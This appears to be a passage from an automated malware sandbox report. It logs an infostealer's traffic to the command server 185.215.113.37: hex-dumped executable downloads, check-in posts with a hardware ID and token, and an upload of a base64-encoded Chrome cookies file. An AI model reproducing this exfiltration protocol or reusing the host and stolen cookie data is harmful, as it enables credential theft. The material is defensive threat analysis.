00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:19 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 00:40:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 34 37 43 44 36 43 32 32 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"B547CD6C22534228319403------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"save------GIDBKKKKKFBGDGDHIDBG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="message"browsers------EBKKKEGIDBGHIDGDHDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAFIIJKJEGIDGDGIIDHHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 2d 2d 0d 0a Data Ascii: ------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="message"plugins------FBAFIIJKJEGIDGDGIIDH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="message"fplugins------HIIIJDAAAAAAKECBFBAE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFHost: 185.215.113.37Content-Length: 5751Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 32 37 32 62 61 63 37 36 32 39 61 31 36 34 39 30 62 63 36 66 65 62 37 38 65 65 62 33 31 36 66 38 31 38 33 65 32 66 65 66 38 66 38 64 64 37 30 33 61 37 36 65 35 34 38 65 36 63 62 32 65 34 62 63 65 35 66 32 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 67 33 4d 7a 67 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 67 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 33 4f 54 4d 34 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 33 4a 6a 55 30 6c 75 62 31 70 43 59 6a 5a 54 63 6e 63 77 55 47 52 51 54 55 35 6c 54 45 64 4c 63 32 56 6e 5a 6b 78 70 4c 58 52 52 62 6e 5a 70 61 47 38 31 61 45 74 4b 57 45 74 45 54 6d 63 77 61 31 68 4a 55 47 35 6d 56 47 4e 31 64 31 59 31 63 6a 64 53 63 57 70 55 4f 44 6b 7a 63 46 64 48 53 6b 59 33 61 32 78 4c 63 57 78 6b 51 6d 39 71 4e 48 4a 45 53 6e 5a 34 5a 6b 5a 73 5a 30 52 50 51 32 4e 58 4f 57 46 4c 52 47 35 56 4f 58 70 4a 62 46 56 6f 4d 6b 78 51 4d 48 5a 50 4f 47 73 7a 64 56 51 77 5a 30 68 4b 52 44 46 4b 64 6c 5a 42 59 32 78 72 53 6d 35 4c 64 31 70 48 4e 6d 68 45 51 57 77 32 4d 6b 68 79 54 58 68 4f 63 6c 56 6c 63 56 4e 53 4c 56 64 47 4d 55 6f 74 62 44 6c 5a 57 57 64 46 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"76272bac7629a16490bc6feb78eeb316f8183e2fef8f8dd703a76e548e6cb2e4bce5f288------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; 